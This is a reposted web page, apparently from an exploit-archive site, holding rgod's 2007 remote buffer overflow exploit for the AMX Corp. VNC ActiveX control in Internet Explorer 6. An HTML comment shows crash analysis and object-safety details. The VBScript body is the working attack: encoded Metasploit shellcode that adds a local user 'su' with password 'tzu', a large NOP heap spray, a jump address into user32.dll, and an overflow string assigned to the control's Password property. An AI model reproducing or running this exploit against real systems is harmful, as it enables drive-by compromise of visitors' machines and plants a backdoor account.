首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AMX Corp. VNC ActiveX Control (AmxVnc.dll 1.0.13.0) BoF Exploit
来源:retrogod.altervista.org 作者:rgod 发布时间:2007-06-29  
<!--
21.17 23/06/2007
AMX Corp. VNC ActiveX Control (AmxVnc.dll 1.0.13.0) remote buffer
overflow exploit / tested against IE6 on xp sp2 it

found this one inside GHDB, dork by JimmyNeutron:
WebControl intitle:"AMX NetLinx"
description:   "AMX Netlinx is a server appliance which
connects various devices like a beamer, laptop or video
recorder to the internet."

passing A*2000 to Host property:

EAX 03727C20
ECX 027B7890 ASCII "AAAAAAAA...
EDX 41414141
EBX 027ACE80 AmxVnc.027ACE80
ESP 0013DDFC
EBP 0013DE28
ESI 0013E00C
EDI 00000000
EIP 0278D6D1 AmxVnc.0278D6D1
0278D6D1   FF52 04          CALL DWORD PTR DS:[EDX+4]
Access violation when reading 41414145


Password, LogFile properties are also vulnerable
to the same issue

object safety report:

RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data
IPersist Safe:  Safe for untrusted: caller,data
IPStorage Safe:  Safe for untrusted: caller,data
KillBitSet: False

translation: it works remotely without warnings

rgod
site: retrogod.altervista.org

-->
<HTML>
<object classid='clsid:6318EFFA-BE57-49EE-830C-C5E1ABD9ECCB' id='AmxVnc' ></OBJECT>
<script language='vbscript'>

'metasploit one, add a user "su" with pass "tzu"
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44")
nop = string(9999999,unescape("%90"))
jmp = unescape("%ab%08%3e%7e") '0x7e3e08af user32.dll ,stores 0x07c435ff which reasonably points to our 10M nop, found with msfpescan
suntzu = String(1188, "A") + jmp + nop + scode
AmxVnc.Password = suntzu

</script>
</HTML>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sony Network Camera SNC-P5 v1.
·AXIS Camera Control (AxisCamCo
·RealNetworks RealPlayer/HelixP
·MyCMS <= 0.9.8 Remote Command
·WordPress 2.2 (wp-app.php) Arb
·MyCMS <= 0.9.8 Remote Command
·NCTAudioStudio2 ActiveX DLL 2.
·ESRI ArcSDE 9.0 - 9.2sp1 Remot
·Tiny Download&&ExecShellCode
·PNphpBB2 <= 1.2i viewforum.php
·DreamLog 0.5 (upload.php) Arbi
·IE 6 / Dart Communications Pow
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved